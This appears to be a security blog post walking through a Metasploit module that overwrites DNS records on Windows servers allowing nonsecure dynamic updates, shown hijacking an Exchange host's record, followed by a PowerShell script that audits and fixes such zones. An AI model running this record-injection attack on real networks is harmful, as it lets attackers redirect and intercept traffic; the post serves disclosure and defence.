Published: 25 Jun 2017 - 07:35 -0500
Secure-only DNS dynamic updates are the default in Windows, but there is an option to allow "Nonsecure" updates as well. I have seen this changed when non-Windows DHCP servers (e.g. access points) need to register leases, and it opens the network up to some pretty nifty attacks that a Metasploit module just landed for.
You can read up on the pull request at pr/#8599.
Just to drive home the point I'll be using my Exchange server as a target.
If you are going to be overwriting an existing record, make sure to keep a note of the real IP address of the host you are overwriting so that you can fix the record afterwards:

$ dig @192.168.80.10 sdexchange.sittingduck.info
;; ANSWER SECTION:
sdexchange.sittingduck.info. 1200 IN A 192.168.80.13
Here is what the module looks like:
msf > use auxiliary/admin/dns/dyn_dns_update
msf auxiliary(dyn_dns_update) > show options

Module options (auxiliary/admin/dns/dyn_dns_update):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CHOST                      no        The source address to use for queries and updates
   DOMAIN                     yes       The domain name
   HOSTNAME                   yes       The name record you want to add
   IP                         no        The IP you want to assign to the record
   RHOST                      yes       The vulnerable DNS server IP address
   TYPE      A                yes       The record type you want to add. (Accepted: A, AAAA, CNAME, TXT)
   VALUE                      no        The string to be added with TXT or CNAME record

Auxiliary action:

   Name    Description
   ----    -----------
   UPDATE  Add or update a record. (default)
It has three different actions, but you'll mostly want UPDATE, which automatically deletes the record if it already exists and then adds it back with your specified settings:

msf auxiliary(dyn_dns_update) > show actions

Auxiliary actions:

   Name    Description
   ----    -----------
   ADD     Add a new record. Fail if it already exists.
   DELETE  Delete an existing record.
   UPDATE  Add or update a record. (default)
Here are the settings I chose. Notice that the IP address I'm injecting isn't even on the same subnet as the domain:

msf auxiliary(dyn_dns_update) > set DOMAIN sittingduck.info
DOMAIN => sittingduck.info
msf auxiliary(dyn_dns_update) > set HOSTNAME sdexchange
HOSTNAME => sdexchange
msf auxiliary(dyn_dns_update) > set IP 100.100.100.100
IP => 100.100.100.100
msf auxiliary(dyn_dns_update) > set RHOST 192.168.80.10
RHOST => 192.168.80.10
And the output:
msf auxiliary(dyn_dns_update) > run

[+] Found existing A record for sdexchange.sittingduck.info
[*] Sending dynamic DNS delete message...
[+] The record 'sdexchange.sittingduck.info => 100.100.100.100' has been deleted!
[*] Sending dynamic DNS add message...
[+] The record 'sdexchange.sittingduck.info => 100.100.100.100' has been added!
[*] Auxiliary module execution completed
msf auxiliary(dyn_dns_update) >

The rogue record stays in place until someone fixes it by hand or the original host performs its next dynamic DNS update (every 24 hours or so).
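As an added example (not code from the post or the Metasploit module), here is the other side of this: a PowerShell audit of the zone setting the module relies on. It lists every primary zone on a Windows DNS server whose DynamicUpdate is NonsecureAndSecure and, with -Fix, switches AD-integrated ones back to Secure. The server name and the -Fix switch are assumptions for the example.

```powershell
# Added example: audit Windows DNS primary zones for nonsecure dynamic updates.
# Assumes the DnsServer PowerShell module (DNS role or RSAT) and read rights on $DnsServer.
param(
    [string]$DnsServer = 'localhost',   # assumption: DNS server to audit
    [switch]$Fix                        # assumption: when set, repair AD-integrated zones
)

Import-Module DnsServer

# Only primary zones accept updates; auto-created zones (0.in-addr.arpa etc.) are skipped.
$zones = Get-DnsServerZone -ComputerName $DnsServer |
    Where-Object { $_.ZoneType -eq 'Primary' -and -not $_.IsAutoCreated }

foreach ($zone in $zones) {
    $status = switch ($zone.DynamicUpdate) {
        'Secure'             { 'OK' }
        'None'               { 'OK (dynamic updates disabled)' }
        'NonsecureAndSecure' { 'RISK: unauthenticated updates accepted' }
        default              { "Unknown ($($zone.DynamicUpdate))" }
    }

    [pscustomobject]@{
        Zone          = $zone.ZoneName
        ADIntegrated  = $zone.IsDsIntegrated
        DynamicUpdate = $zone.DynamicUpdate
        Status        = $status
    }

    if ($Fix -and $zone.DynamicUpdate -eq 'NonsecureAndSecure') {
        if ($zone.IsDsIntegrated) {
            # 'Secure' is only valid for AD-integrated zones, where updates are ACL-checked.
            Set-DnsServerPrimaryZone -ComputerName $DnsServer -Name $zone.ZoneName -DynamicUpdate Secure
        } else {
            # File-backed zones cannot do secure updates: either integrate them into AD
            # (ConvertTo-DnsServerPrimaryZone -ReplicationScope Domain) or set DynamicUpdate None.
            Write-Warning "$($zone.ZoneName) is file-backed; 'Secure' requires an AD-integrated zone."
        }
    }
}
```

Run it with -Fix only after checking which non-Windows devices register themselves in the flagged zones, since they will lose the ability to update their own records.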